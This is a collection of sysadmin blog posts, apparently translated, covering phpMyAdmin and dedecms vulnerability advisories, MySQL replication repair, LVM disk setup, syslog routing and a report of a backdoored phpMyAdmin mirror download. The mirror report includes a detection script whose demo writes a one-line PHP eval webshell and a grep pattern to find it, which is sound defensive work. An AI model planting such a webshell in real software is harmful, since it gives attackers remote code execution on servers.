

phpMyAdmin 3.5.x HTML injection (XSS) vulnerability (CVE-2012-5339)

PMASA-2012-6

Announcement-ID: PMASA-2012-6

Date: 2012-10-12

Summary

Multiple XSS due to unescaped HTML output in Trigger, Procedure and Event pages.

Description

When creating/modifying a trigger, event or procedure with a crafted name, it is possible to trigger an XSS.

The Trigger, Procedure and Event pages of phpMyAdmin do not escape their HTML output correctly, so creating or modifying a trigger, event or procedure with a specially crafted name triggers cross-site scripting, which can expose sensitive information or hijack the user's session.

Severity

We consider these vulnerabilities to be non critical.

Mitigation factor

These XSS can only be triggered when a crafted value is entered by the user.

Affected Versions

Versions 3.5.x are affected.

Solution

Upgrade to phpMyAdmin 3.5.3 or newer, or apply the patches listed in the advisory (linked under References).

References

Thanks to Maxim Rupp for reporting an issue when creating an event.

Assigned CVE ids: CVE-2012-5339

CWE ids: CWE-661 CWE-79

http://sebug.net/vuldb/ssvid-60440
http://www.phpmyadmin.net/home_page/security/PMASA-2012-6.php

Posted in Security Advisories.



Fixing MySQL replication error 1062

Percona-Server-5.5.22-rel25.2: one of the slaves replicating the discuzx database stopped with an error, Slave_SQL_Running was No.

show slave status;

    Slave_IO_State: Waiting for master to send event
    Master_Host: 192.168.0.99
    Master_User: xxx
    Master_Port: 3306
    Connect_Retry: 60
    Master_Log_File: mysql-bin.000059
    Read_Master_Log_Pos: 63986019
    Relay_Log_File: C1g-relay-bin.000417
    Relay_Log_Pos: 48985722
    Relay_Master_Log_File: mysql-bin.000059
    Slave_IO_Running: Yes
    Slave_SQL_Running: No
    Replicate_Do_DB: discuzx
    Replicate_Ignore_DB:
    Replicate_Do_Table:
    Replicate_Ignore_Table: discuzx.pre_common_admincp_session,discuzx.pre_common_session
    Replicate_Wild_Do_Table:
    Replicate_Wild_Ignore_Table:
    Last_Errno: 1062
    Last_Error: Error 'Duplicate entry '1503760-25' for key 'PRIMARY'' on query. Default database: 'discuzx'. Query: 'INSERT INTO pre_forum_post SET `fid`='456' , `tid`='1553760' , `first`='0' , `author`='xxx' , `authorid`='4018205' , `subject`='' , `dateline`='1349931502' , `message`='xxx' , `useip`='61.165.2.2' , `invisible`='0' , `anonymous`='0' , `usesig`='1' , `htmlon`='0' , `bbcodeoff`=0 , `smileyoff`='-1' , `parseurloff`=0 , `attachment`='0' , `status`='0' , `pid`='12202748''
    Skip_Counter: 0
    Exec_Master_Log_Pos: 48985576
    Relay_Log_Space: 64152580
    Until_Condition: None
    Until_Log_File:

First tried repairing the table pre_forum_post, then deleted the row with primary key 1503760-25 and ran start slave; there were still many errors on other tables:

    Last_Error: Error 'Duplicate entry '3064092' for key 'PRIMARY'' on query. Default database: 'discuzx'. Query: 'INSERT INTO pre_common_member_action_log SET `uid`='4818285' , `action`='1' , `dateline`='1349931502''

    Last_Error: Error 'Duplicate entry '2327049' for key 'PRIMARY'' on query. Default database: 'discuzx'. Query: 'INSERT INTO pre_home_notification SET `uid`='4047895' , `type`='post' , `new`='1' , `authorid`='4818285' , `author`='xxx' , `note`='xxx' , `dateline`='1349931502' , `from_id`='12002748' , `from_idtype`='quote' , `from_num`='1''

    Last_Error: Error 'Duplicate entry '3409334' for key 'PRIMARY'' on query. Default database: 'discuzx'. Query: 'INSERT INTO pre_common_credit_rule_log SET `uid`='4082252' , `rid`='5' , `fid`='0' , `total`='1' , `cyclenum`='1' , `dateline`='1349931503' , `extcredits2`='-2''

Skipping one event at a time with sql_slave_skip_counter did not help (the next event hit the same error):

    stop slave;
    set global sql_slave_skip_counter = 1;
    start slave;

Batch-repair the tables: online with mysqlcheck -A -o -r -p, or with the service stopped using myisamchk.

Ignore all 1062 errors in my.cnf. Note that this makes the SQL thread silently drop every INSERT that collides with an existing row, so the slave can drift from the master; compare the affected tables afterwards (for example with pt-table-checksum) before trusting this slave for reads.

    slave-skip-errors = 1062

Restart MySQL:

/opt/mysql/bin/mysql.server restart

After the restart the slave failed with a relay log read error (Last_Errno 1594):

    Last_Errno: 1594
    Last_Error: Relay log read failure: Could not parse relay log event entry. The possible reasons are: the master's binary log is corrupted (you can check this by running 'mysqlbinlog' on the binary log), the slave's relay log is corrupted (you can check this by running 'mysqlbinlog' on the relay log), a network problem, or a bug in the master's or slave's MySQL code. If you want to check the master's binary log or slave's relay log, you will be able to know their names by issuing 'SHOW SLAVE STATUS' on this slave.

show slave status;

    Connect_Retry: 60
    Master_Log_File: mysql-bin.000059
    Read_Master_Log_Pos: 89775799
    Relay_Log_File: C1g-relay-bin.000417
    Relay_Log_Pos: 49139383
    Relay_Master_Log_File: mysql-bin.000059
    Slave_IO_Running: Yes
    Slave_SQL_Running: No
    Replicate_Do_DB: discuzx
    Replicate_Ig...
    Skip_Counter: 1
    Exec_Master_Log_Pos: 49139237
    Relay_Log_Space: 89942788
    Until_Condition: None
    Until_Log_File:
    Until_Log_Pos: 0
    Master_SSL_Allowed

Note the following two values and reset the replication position with them. CHANGE MASTER TO discards the current (corrupt) relay logs and fetches again from the master, so the position must be the one the SQL thread had actually executed (Relay_Master_Log_File and Exec_Master_Log_Pos), not the IO thread's Master_Log_File/Read_Master_Log_Pos, otherwise the events fetched but not yet applied would be lost.

    Relay_Master_Log_File: mysql-bin.000059
    Exec_Master_Log_Pos: 49139237

    stop slave;
    change master to Master_Log_File='mysql-bin.000059', Master_Log_Pos=49139237;
    start slave;

show slave status;

    Slave_IO_Running: Yes
    Slave_SQL_Running: Yes

Then checked the positions on the other slaves and on the master; everything was consistent, the repair succeeded.
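The re-pointing step above as an added shell example; this is not code from the original post. It extracts the position from SHOW SLAVE STATUS\G output and prints the three statements, deliberately using the SQL thread's position (Relay_Master_Log_File, Exec_Master_Log_Pos) rather than the IO thread's, and refuses to emit anything while the SQL thread is still running. The sample status text is constructed, using the log file name and positions from the post; the field names are the real SHOW SLAVE STATUS fields.

```shell
#!/bin/sh
# Added example, not code from the original post: turn the output of
# SHOW SLAVE STATUS\G into the STOP SLAVE / CHANGE MASTER / START SLAVE
# statements used after a relay-log read failure (Last_Errno 1594).

# Constructed sample of "mysql -e 'SHOW SLAVE STATUS\G'" output, trimmed to
# the fields used here; file name and positions are the ones from the post.
SAMPLE_STATUS='*************************** 1. row ***************************
               Slave_IO_State: Waiting for master to send event
                  Master_Host: 192.168.0.99
              Master_Log_File: mysql-bin.000059
          Read_Master_Log_Pos: 89775799
               Relay_Log_File: C1g-relay-bin.000417
                Relay_Log_Pos: 49139383
        Relay_Master_Log_File: mysql-bin.000059
             Slave_IO_Running: Yes
            Slave_SQL_Running: No
                   Last_Errno: 1594
          Exec_Master_Log_Pos: 49139237'

# slave_field STATUS NAME -> value of field NAME (exact name match, so that
# Master_Log_File does not accidentally pick up Relay_Master_Log_File)
slave_field() {
    printf '%s\n' "$1" | awk -v key="$2" -F': *' '
        { sub(/^ +/, "", $1) }
        $1 == key { print $2; exit }'
}

# change_master_sql STATUS -> statements that re-point the slave at the last
# executed position; exits 1 when the SQL thread is running or a position
# field is missing, so the output can be piped straight into mysql
change_master_sql() {
    status=$1
    sql_running=$(slave_field "$status" Slave_SQL_Running)
    logfile=$(slave_field "$status" Relay_Master_Log_File)
    pos=$(slave_field "$status" Exec_Master_Log_Pos)
    if [ "$sql_running" != "No" ]; then
        echo "Slave_SQL_Running is '$sql_running', nothing to re-point" >&2
        return 1
    fi
    case $pos in
        '' | *[!0-9]*) echo "bad Exec_Master_Log_Pos: '$pos'" >&2; return 1 ;;
    esac
    if [ -z "$logfile" ]; then
        echo "Relay_Master_Log_File missing" >&2
        return 1
    fi
    printf 'STOP SLAVE;\n'
    printf "CHANGE MASTER TO MASTER_LOG_FILE='%s', MASTER_LOG_POS=%s;\n" "$logfile" "$pos"
    printf 'START SLAVE;\n'
}

# Real use: change_master_sql "$(mysql -e 'SHOW SLAVE STATUS\G')" | mysql
change_master_sql "$SAMPLE_STATUS"
```

Run it against the live server only after the slave-skip-errors question above is settled; re-pointing does not recover rows that were skipped.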




Reference: http://www.cnblogs.com/niniwzw/archive/2010/02/04/1663685.html

Posted in MySQL.



dedecms (织梦) < 5.7: multiple SQL injection vulnerabilities

Affected versions:

dedecms < 5.7

Description:

BUGTRAQ ID: 51211 CVE ID: CVE-2011-5200

DedeCms is a free PHP content management system.

DedeCMS 5.6 contains multiple SQL injection vulnerabilities in the id parameter passed to list.php, members.php and book.php. A remote attacker can use them to take control of the application, read or modify data, or exploit further weaknesses in the underlying database.

Reference: http://www.exploit-db.com/exploits/18292/

Security advice:

Vendor patch:

dedecms

The vendor has not yet released a patch or upgrade; users of this software should watch the vendor's homepage for the latest version:

http://www.dedecms.com/products/dedecms/

Reference: http://sebug.net/vuldb/ssvid-60403

Posted in Security Advisories.



SourceForge's Korean mirror node was compromised; phpMyAdmin downloaded recently may be affected

Brief description:

Saw on Weibo that Tencent's security team reported some SourceForge servers had been compromised and backdoors planted in some source packages. On closer study it turned out that SourceForge itself was not compromised; the problem was on servers of the Korean mirror provider cdnetworks described below.

Details:

When downloading source from SourceForge, a mirror node is chosen automatically according to network conditions. Since China has no mirror server, downloads come from the nearest node, in Korea. This time Tencent also found phpMyAdmin source with a backdoor planted. Our analysis found no problem on the other nodes; only some of the mirrors provided by cdnetworks in Korea were affected.

Proof: the phpMyAdmin source downloaded from the automatically selected Korean node contains a backdoor, /server_sync.php, holding a one-line webshell. http://cdnetworks-kr-1.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.5.2.2/phpMyAdmin-3.5.2.2-all-languages.zip

Comparing against the package from the domestic mirror (国网中心) confirmed that there is indeed an extra file, server_sync.php.
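The comparison described in the report, as an added shell example that is not part of the original report or of phpMyAdmin. Given two unpacked copies of the archive, it lists files that exist only in the suspect copy, files whose content differs, and PHP files that feed request input straight to eval() or assert(). The directory contents are constructed for the demo; only the file name server_sync.php comes from the report, and the two copies are assumed to have been unpacked into separate directories. Verifying the project's published checksum or GPG signature of the archive is the stronger check; this is for the case where all you have is two downloads.

```shell
#!/bin/sh
# Added example, not code from the original report or from phpMyAdmin:
# diff two unpacked archive trees and look for a one-line PHP webshell.

# extra_files REF SUSPECT -> relative paths present in SUSPECT but not in REF
extra_files() {
    tmp=$(mktemp -d)
    (cd "$1" && find . -type f | sed 's|^\./||' | LC_ALL=C sort) > "$tmp/ref"
    (cd "$2" && find . -type f | sed 's|^\./||' | LC_ALL=C sort) > "$tmp/suspect"
    comm -13 "$tmp/ref" "$tmp/suspect"
    rm -rf "$tmp"
}

# changed_files REF SUSPECT -> relative paths present in both trees whose bytes differ
changed_files() {
    (cd "$1" && find . -type f | sed 's|^\./||' | LC_ALL=C sort) |
    while IFS= read -r f; do
        [ -f "$2/$f" ] || continue
        cmp -s "$1/$f" "$2/$f" || printf '%s\n' "$f"
    done
}

# webshell_hits DIR -> PHP files under DIR that pass $_POST/$_GET/$_REQUEST/
# $_COOKIE input directly to eval() or assert(); prints nothing and still
# exits 0 when there are none
webshell_hits() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        '(eval|assert)[[:space:]]*\([[:space:]]*\$_(POST|GET|REQUEST|COOKIE)\[' {} + || true
}

# make_demo -> path of a scratch directory holding two constructed trees:
# reference/ (clean) and korean-mirror/ (same files plus the planted backdoor)
make_demo() {
    base=$(mktemp -d)
    for side in reference korean-mirror; do
        d="$base/$side/phpMyAdmin-3.5.2.2-all-languages"
        mkdir -p "$d/libraries"
        printf '<?php\n// constructed stand-in for the real index.php\n' > "$d/index.php"
        printf '<?php\n// constructed stand-in for libraries/common.inc.php\n' > "$d/libraries/common.inc.php"
    done
    # constructed one-line webshell of the kind the report describes
    printf '%s\n' '<?php @eval($_POST["c"]); ?>' \
        > "$base/korean-mirror/phpMyAdmin-3.5.2.2-all-languages/server_sync.php"
    printf '%s\n' "$base"
}

# Demo run on the constructed trees; with real downloads, unpack both archives
# and pass the two top-level directories instead.
DEMO=$(make_demo)
extra_files "$DEMO/reference/phpMyAdmin-3.5.2.2-all-languages" \
            "$DEMO/korean-mirror/phpMyAdmin-3.5.2.2-all-languages"
rm -rf "$DEMO"
```

The grep pattern is only a quick triage for the exact kind of backdoor found here; a modified existing file (caught by changed_files) is the more common way a mirror is tampered with, and it needs a manual diff.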

Reference: http://www.wooyun.org/bugs/wooyun-2010-012705#0-tsina-1-27413-397232819ff9a47a7b7e80a40613cfe1

Posted in Security Advisories.



Oracle MySQL 5.1.x denial of service vulnerability (CVE-2012-2749)

Published: 2012-08-21 (GMT+0800)

Affected versions:

MySQL 5.1.x

Description:

BUGTRAQ ID: 55120 CVE ID: CVE-2012-2749

MySQL is a small relational database management system developed by the Swedish company MySQL AB, which was acquired by Sun on 16 January 2008.

MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 contain a flaw that lets an authenticated user crash mysqld (denial of service) through incorrect calculation and sort-order indexes.

References: https://bugzilla.redhat.com/show_bug.cgi?id=833737 http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html

Security advice:

Vendor patch:

MySQL AB

The vendor has released an upgrade that fixes this issue; download it from the vendor's homepage:

http://www.mysql.com/

Reference: http://sebug.net/vuldb/ssvid-60344

Posted in Security Advisories.



phpMyAdmin 3.4.x multiple HTML injection (XSS) vulnerabilities

PMASA-2012-4

Announcement-ID: PMASA-2012-4

Date: 2012-08-16

Summary

phpMyAdmin versions before 3.4.11.1 and before 3.5.2.2 contain multiple HTML injection vulnerabilities. An attacker can inject HTML and JavaScript into the affected site, leading to theft of authentication credentials and control over the site's appearance.

Multiple XSS in Table operations, Database structure, Trigger and Visualize GIS data pages.

Description

Using a crafted table name, it was possible to produce a XSS:

1) On the Database Structure page, creating a new table with a crafted name
2) On the Database Structure page, using the Empty and Drop links of the crafted table name
3) On the Table Operations page of a crafted table, using the 'Empty the table (TRUNCATE)' and 'Delete the table (DROP)' links
4) On the Triggers page of a database containing tables with a crafted name, when opening the 'Add Trigger' popup
5) When creating a trigger for a table with a crafted name, with an invalid definition.

Having crafted data in a database table, it was possible to produce a XSS:

6) When visualizing GIS data, having a crafted label name.

Severity

We consider these vulnerabilities to be non critical.

Mitigation factor

These XSS can only be triggered when a table with a crafted name is already present, or if crafted data is already stored in a database table.

Affected Versions

Versions 3.4.x are affected, for issues #1 and #2. Versions 3.5.x are affected, for all issues.

Solution

Upgrade to phpMyAdmin 3.4.11.1 or 3.5.2.2 or newer, or apply the patches listed in the advisory: http://www.phpmyadmin.net/home_page/security/PMASA-2012-4.php

Download the latest phpMyAdmin

Posted in Security Advisories.



Creating an LVM partition on a new disk under Linux

The Dell R410 originally had two 146G disks; a third 146G disk was added. Disks are cheap now: 650 yuan on Tmall, plus 70 yuan for a drive caddy.

Enable hardware detection and reboot the server:

    chkconfig haldaemon on
    chkconfig messagebus on
    chkconfig kudzu on    # CentOS 6 has no kudzu service; udev handles detection there

The new disk was detected as /dev/sdc:

fdisk -l

    Disk /dev/sda: 146.8 GB, 146815733760 bytes
    255 heads, 63 sectors/track, 17849 cylinders
    Units = cylinders of 16065 * 512 = 8225280 bytes

       Device Boot      Start         End      Blocks   Id  System
    /dev/sda1   *           1          25      200781   83  Linux
    /dev/sda2              26        1069     8385930   82  Linux swap / Solaris
    /dev/sda3            1070       17849   134785350   8e  Linux LVM

    Disk /dev/sdb: 146.8 GB, 146815733760 bytes
    255 heads, 63 sectors/track, 17849 cylinders
    Units = cylinders of 16065 * 512 = 8225280 bytes

       Device Boot      Start         End      Blocks   Id  System
    /dev/sdb1   *           1       17849   143372061   8e  Linux LVM

    Disk /dev/sdc: 146.8 GB, 146815737856 bytes
    255 heads, 63 sectors/track, 17849 cylinders
    Units = cylinders of 16065 * 512 = 8225280 bytes

    Disk /dev/sdc doesn't contain a valid partition table

Check the existing PVs:

pvdisplay

      --- Physical volume ---
      PV Name               /dev/sdb1
      VG Name               VolGroup01
      PV Size               136.73 GB / not usable 11.78 MB
      Allocatable           yes (but full)
      PE Size (KByte)       32768
      Total PE              4375
      Free PE               0
      Allocated PE          4375
      PV UUID               p2QSKt-hLuG-xGF5-Cj8t-9IxX-cKCf-hP7hIu

      --- Physical volume ---
      PV Name               /dev/sda3
      VG Name               VolGroup00
      PV Size               128.54 GB / not usable 10.32 MB
      Allocatable           yes (but full)
      PE Size (KByte)       32768
      Total PE              4113
      Free PE               0
      Allocated PE          4113
      PV UUID               wdCg83-8jEM-XQtP-gmuX-lYor-IpWn-Hve2mr

Partition the new disk; the partition type id for LVM is 8e:

fdisk /dev/sdc

    Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
    Building a new DOS disklabel. Changes will remain in memory only,
    until you decide to write them. After that, of course, the previous
    content won't be recoverable.

    The number of cylinders for this disk is set to 17849.
    There is nothing wrong with that, but this is larger than 1024,
    and could in certain setups cause problems with:
    1) software that runs at boot time (e.g., old versions of LILO)
    2) booting and partitioning software from other OSs
       (e.g., DOS FDISK, OS/2 FDISK)
    Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)

    Command (m for help): p

    Disk /dev/sdc: 146.8 GB, 146815737856 bytes
    255 heads, 63 sectors/track, 17849 cylinders
    Units = cylinders of 16065 * 512 = 8225280 bytes

       Device Boot      Start         End      Blocks   Id  System

    Command (m for help): n
    Command action
       e   extended
       p   primary partition (1-4)
    p
    Partition number (1-4): 1
    First cylinder (1-17849, default 1):
    Using default value 1
    Last cylinder or +size or +sizeM or +sizeK (1-17849, default 17849):
    Using default value 17849

    Command (m for help): p

    Disk /dev/sdc: 146.8 GB, 146815737856 bytes
    255 heads, 63 sectors/track, 17849 cylinders
    Units = cylinders of 16065 * 512 = 8225280 bytes

       Device Boot      Start         End      Blocks   Id  System
    /dev/sdc1               1       17849   143372061   83  Linux

    Command (m for help): t
    Selected partition 1
    Hex code (type L to list codes): 8e
    Changed system type of partition 1 to 8e (Linux LVM)

    Command (m for help): p

    Disk /dev/sdc: 146.8 GB, 146815737856 bytes
    255 heads, 63 sectors/track, 17849 cylinders
    Units = cylinders of 16065 * 512 = 8225280 bytes

       Device Boot      Start         End      Blocks   Id  System
    /dev/sdc1               1       17849   143372061   8e  Linux LVM

    Command (m for help): w

Create the PV:

    # pvcreate /dev/sdc1
      Physical volume "/dev/sdc1" successfully created
    # pvdisplay
      --- Physical volume ---
      PV Name               /dev/sdb1
      VG Name               VolGroup01
      PV Size               136.73 GB / not usable 11.78 MB
      Allocatable           yes (but full)
      PE Size (KByte)       32768
      Total PE              4375
      Free PE               0
      Allocated PE          4375
      PV UUID               p2QSKt-hLuG-xGF5-Cj8t-9IxX-cKCf-hP7hIu

      --- Physical volume ---
      PV Name               /dev/sda3
      VG Name               VolGroup00
      PV Size               128.54 GB / not usable 10.32 MB
      Allocatable           yes (but full)
      PE Size (KByte)       32768
      Total PE              4113
      Free PE               0
      Allocated PE          4113
      PV UUID               wdCg83-8jEM-XQtP-gmuX-lYor-IpWn-Hve2mr

      "/dev/sdc1" is a new physical volume of "136.73 GB"
      --- NEW Physical volume ---
      PV Name               /dev/sdc1
      VG Name
      PV Size               136.73 GB
      Allocatable           NO
      PE Size (KByte)       0
      Total PE              0
      Free PE               0
      Allocated PE          0
      PV UUID               rifdUK-ACXa-hGlM-L5iD-UkZ5-p4It-pshfwd

Create the VG:

    # vgcreate VolGroup02 /dev/sdc1
      Volume group "VolGroup02" successfully created
    # vgdisplay
      --- Volume group ---
      VG Name               VolGroup02
      System ID
      Format                lvm2
      Metadata Areas        1
      Metadata Sequence No  1
      VG Access             read/write
      VG Status             resizable
      MAX LV                0
      Cur LV                0
      Open LV               0
      Max PV                0
      Cur PV                1
      Act PV                1
      VG Size               136.73 GB
      PE Size               4.00 MB
      Total PE              35002
      Alloc PE / Size       0 / 0
      Free  PE / Size       35002 / 136.73 GB
      VG UUID               YLvkVA-OZQJ-p3yZ-5fEg-4xmH-dXMF-6ZcqTY

      --- Volume group ---
      VG Name               VolGroup01
      System ID
      Format                lvm2
      Metadata Areas        1
      Metadata Sequence No  2
      VG Access             read/write
      VG Status             resizable
      MAX LV                0
      Cur LV                1
      Open LV               1
      Max PV                0
      Cur PV                1
      Act PV                1
      VG Size               136.72 GB
      PE Size               32.00 MB
      Total PE              4375
      Alloc PE / Size       4375 / 136.72 GB
      Free  PE / Size       0 / 0
      VG UUID               bTRPY7-sETF-7yrw-8Iaa-jgMp-msLb-VFf9Pv

      --- Volume group ---
      VG Name               VolGroup00
      System ID
      Format                lvm2
      Metadata Areas        1
      Metadata Sequence No  3
      VG Access             read/write
      VG Status             resizable
      MAX LV                0
      Cur LV                2
      Open LV               2
      Max PV                0
      Cur PV                1
      Act PV                1
      VG Size               128.53 GB
      PE Size               32.00 MB
      Total PE              4113
      Alloc PE / Size       4113 / 128.53 GB
      Free  PE / Size       0 / 0
      VG UUID               dZu73K-djmf-Qqes-7Bl2-NcGr-12cx-2ygDPt

Create the logical volume, giving it all of the free space:

    # lvcreate -l 100%FREE -n /dev/VolGroup02/LogVol00 VolGroup02
      Logical volume "LogVol00" created
    # lvdisplay
      --- Logical volume ---
      LV Name                /dev/VolGroup02/LogVol00
      VG Name                VolGroup02
      LV UUID                TThlLG-BUNw-smr9-Cv1d-cv8D-1V8i-cB0Hfa
      LV Write Access        read/write
      LV Status              available
      # open                 0
      LV Size                136.73 GB
      Current LE             35002
      Segments               1
      Allocation             inherit
      Read ahead sectors     auto
      - currently set to     256
      Block device           253:3

      --- Logical volume ---
      LV Name                /dev/VolGroup01/LogVol00
      VG Name                VolGroup01
      LV UUID                0JbGWl-ivcx-g4WL-JHY7-RcXc-hEM5-V3htC1
      LV Write Access        read/write
      LV Status              available
      # open                 1
      LV Size                136.72 GB
      Current LE             4375
      Segments               1
      Allocation             inherit
      Read ahead sectors     auto
      - currently set to     256
      Block device           253:2

      --- Logical volume ---
      LV Name                /dev/VolGroup00/LogVol01
      VG Name                VolGroup00
      LV UUID                cZ3Vnw-PMIx-LUNQ-N53R-etKc-s1BS-AmQE82
      LV Write Access        read/write
      LV Status              available
      # open                 1
      LV Size                118.53 GB
      Current LE             3793
      Segments               1
      Allocation             inherit
      Read ahead sectors     auto
      - currently set to     256
      Block device           253:0

      --- Logical volume ---
      LV Name                /dev/VolGroup00/LogVol00
      VG Name                VolGroup00
      LV UUID                R5fS7y-9649-kyZi-VFmn-24lh-ju2w-Uk7TzY
      LV Write Access        read/write
      LV Status              available
      # open                 1
      LV Size                10.00 GB
      Current LE             320
      Segments               1
      Allocation             inherit
      Read ahead sectors     auto
      - currently set to     256
      Block device           253:1

Format the volume. The Linux filesystem creation tools reserve a percentage of the space (5% by default) for root or a designated user; the -m reserved-percentage option of mke2fs lowers this to gain usable space with no effect on performance. The setting can also be changed after the filesystem exists with tune2fs, e.g. tune2fs -m 1 on the formatted device (here that is the logical volume /dev/VolGroup02/LogVol00, not the raw partition /dev/sdc1) sets the reserve to 1%. The default shows up in the mkfs output as "1792102 blocks (5.00%) reserved for the super user".

    # mkfs -t ext3 /dev/VolGroup02/LogVol00
    mke2fs 1.39 (29-May-2006)
    Filesystem label=
    OS type: Linux
    Block size=4096 (log=2)
    Fragment size=4096 (log=2)
    17924096 inodes, 35842048 blocks
    1792102 blocks (5.00%) reserved for the super user
    First data block=0
    Maximum filesystem blocks=4294967296
    1094 block groups
    32768 blocks per group, 32768 fragments per group
    16384 inodes per group
    Superblock backups stored on blocks:
            32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
            4096000, 7962624, 11239424, 20480000, 23887872

    Writing inode tables: done
    Creating journal (32768 blocks): done
    Writing superblocks and filesystem accounting information: done

    This filesystem will be automatically checked every 23 mounts or
    180 days, whichever comes first.  Use tune2fs -c or -i to override.

Mount the volume:

    # mkdir /data
    # mount /dev/VolGroup02/LogVol00 /data
    # df -h
    Filesystem                       Size  Used Avail Use% Mounted on
    /dev/mapper/VolGroup00-LogVol01  115G   12G   98G  11% /
    /dev/mapper/VolGroup00-LogVol00  9.7G  152M  9.1G   2% /tmp
    /dev/mapper/VolGroup01-LogVol00  133G   35G   91G  28% /opt
    /dev/sda1                        190M   13M  168M   7% /boot
    tmpfs                            7.9G   92K  7.9G   1% /dev/shm
    /dev/mapper/VolGroup02-LogVol00  135G  188M  128G   1% /data

Mount it automatically at boot:

    vi /etc/fstab
    /dev/VolGroup02/LogVol00 /data ext3 defaults 1 2

Test writing to it:

    # cd /data
    # touch testfile

Update 2012-12-14: to release the space Linux reserves for the superuser, add -m 1 when formatting; this gives more usable space:

mkfs -t ext3 -m 1 /dev/VolGroup02/LogVol00
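The whole procedure as one non-interactive script, an added example rather than the commands the post was typed with. It prints the plan by default (DRY_RUN=1) and only executes it with DRY_RUN=0, at which point it first refuses any disk that already carries a filesystem, partition-table or LVM signature (wipefs without -a only lists signatures). It uses parted in script mode instead of interactive fdisk and includes the -m 1 change from the update. The device, volume-group, logical-volume and mount-point names are the post's; everything else is an assumption.

```shell
#!/bin/sh
# Added example, not code from the original post: provision a new disk as one
# LVM partition -> PV -> VG -> LV -> ext3 with 1% reserved blocks, then mount it.
# Commands are printed, not run, unless DRY_RUN=0.

# run CMD... -> print the command (dry run, default) or execute it
run() {
    if [ "${DRY_RUN:-1}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# provision_lvm_disk DISK VG LV MOUNTPOINT -> the seven steps from the post,
# guarded against repartitioning a disk that is already in use
provision_lvm_disk() {
    disk=$1 vg=$2 lv=$3 mnt=$4
    part="${disk}1"
    # Only checked for real runs: wipefs lists existing signatures (filesystem,
    # partition table, LVM2_member) and prints nothing for a blank disk.
    if [ "${DRY_RUN:-1}" != "1" ] && wipefs "$disk" | grep -q .; then
        echo "$disk already carries signatures, refusing to repartition it" >&2
        return 1
    fi
    run parted -s "$disk" mklabel msdos mkpart primary 1MiB 100% set 1 lvm on
    run pvcreate "$part"
    run vgcreate "$vg" "$part"
    run lvcreate -l 100%FREE -n "$lv" "$vg"
    run mkfs -t ext3 -m 1 "/dev/$vg/$lv"
    run mkdir -p "$mnt"
    run mount "/dev/$vg/$lv" "$mnt"
}

# fstab_entry VG LV MOUNTPOINT -> the /etc/fstab line (fsck pass 2, as in the post)
fstab_entry() {
    printf '/dev/%s/%s\t%s\text3\tdefaults\t1 2\n' "$1" "$2" "$3"
}

# Dry run prints the plan; "DRY_RUN=0 sh lvm.sh" as root executes it.
provision_lvm_disk /dev/sdc VolGroup02 LogVol00 /data
fstab_entry VolGroup02 LogVol00 /data
```

Review the printed plan before switching DRY_RUN off; the parted step is the only irreversible one and the guard only protects against a disk that already has recognisable signatures, not against picking the wrong device name.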

Posted in Linux maintenance and tuning.



How to keep nrpe connection logs out of /var/log/messages

nrpe leaves a large number of connection records in messages, which gets in the way of reading the log. My nrpe runs as a daemon:

/opt/nagios/bin/nrpe -c /opt/nagios/etc/nrpe.cfg -d

tail /var/log/messages

    Jul 19 14:04:22 C1gstudio sshd[20749]: Connection closed by 122.111.222.111 [preauth]
    Jul 19 14:09:22 C1gstudio sshd[21056]: Connection closed by 122.111.222.111 [preauth]

Check how ssh currently logs; the default is facility auth, level info: cat /etc/ssh/sshd_config

    # Logging
    # obsoletes QuietMode and FascistLogging
    #SyslogFacility AUTH
    #LogLevel INFO

Change where the ssh log is written: vi /etc/syslog.conf

    # original line
    *.info;mail.none;authpriv.none;cron.none                /var/log/messages

    # append auth.!=info so that the ssh connection records (logged at auth.info)
    # no longer go to /var/log/messages; other auth priorities still do
    *.info;mail.none;authpriv.none;cron.none;auth.!=info    /var/log/messages

    # add a line sending the ssh (auth facility) log to /var/log/sshd
    auth.*                                                  /var/log/sshd

Reload the syslog service: /etc/init.d/syslog reload

Check the result: tail -f /var/log/messages /var/log/sshd

The ssh connection log is now kept in /var/log/sshd, while nrpe's own messages (startup and so on) still go to /var/log/messages.

Update 2012-08-01: in /etc/syslog.conf the selector must be ;auth.!=info, not ;!auth.info. You can test the routing with logger: logger -p auth.info "hello"

Posted in Nagios, Tech, Logs.



Unrotated Linux system logs cause a false intrusion alert

The logwatch report showed that yesterday someone logged in over SSH and ran some maintenance commands. Strange that an attacker would come in to maintain the system.

A look at recent logins showed none: tail -n100 /var/log/secure

Noticed that the log files under /var/log were very large and that there were no rotated .N files: ll /var/log

Searching by date did turn up the login records. The cause: syslog lines carry no year, and because the log had never been rotated, last year's login on the same date was taken as yesterday's: cat /var/log/secure | grep 'Jul 16'

Ran logrotate by hand: /etc/cron.daily/logrotate. It failed, complaining that the user uucp does not exist (the uucp user had been deleted manually earlier). logrotate -d /etc/logrotate.conf dry-runs the configuration and shows this kind of error without rotating anything.

After removing the uucp logrotate config it ran normally: rm /etc/logrotate.d/uucp

Posted in Linux maintenance and tuning, Logs.



How to quickly fix a Linux read-only file system (Read-only file system)

On systems with heavy I/O a partition can quite often become unwritable; repair it with fsck.

1. Check which partitions exist and their filesystem type: cat /etc/fstab

    /dev/VolGroup00/LogVol03 /opt ext3 defaults 1 2

2. Test in each partition whether it can be written to:

    cd /opt
    touch x
    touch: cannot touch `x': Read-only file system

3. Repair the /opt partition by hand. It must be unmounted before fsck runs: umount /opt. If the unmount fails because the device is busy, fuser -mk /opt kills every process that has files open on the mount (SIGKILL by default; run fuser -mv /opt first to see what would be killed).

Repair as ext3: fsck -t ext3 /opt

Remount the partition and it can be written again: mount /opt

PS: to remount read-write without repairing: mount -o rw,remount /opt. The kernel switched the filesystem to read-only because of an error (a journal abort or errors=remount-ro), so this only hides the problem until the next error; treat it as a stopgap and still schedule the fsck.

At boot, fsck is run automatically for the filesystems with a non-zero pass number in /etc/fstab.

It is advisable to put /var on its own partition.
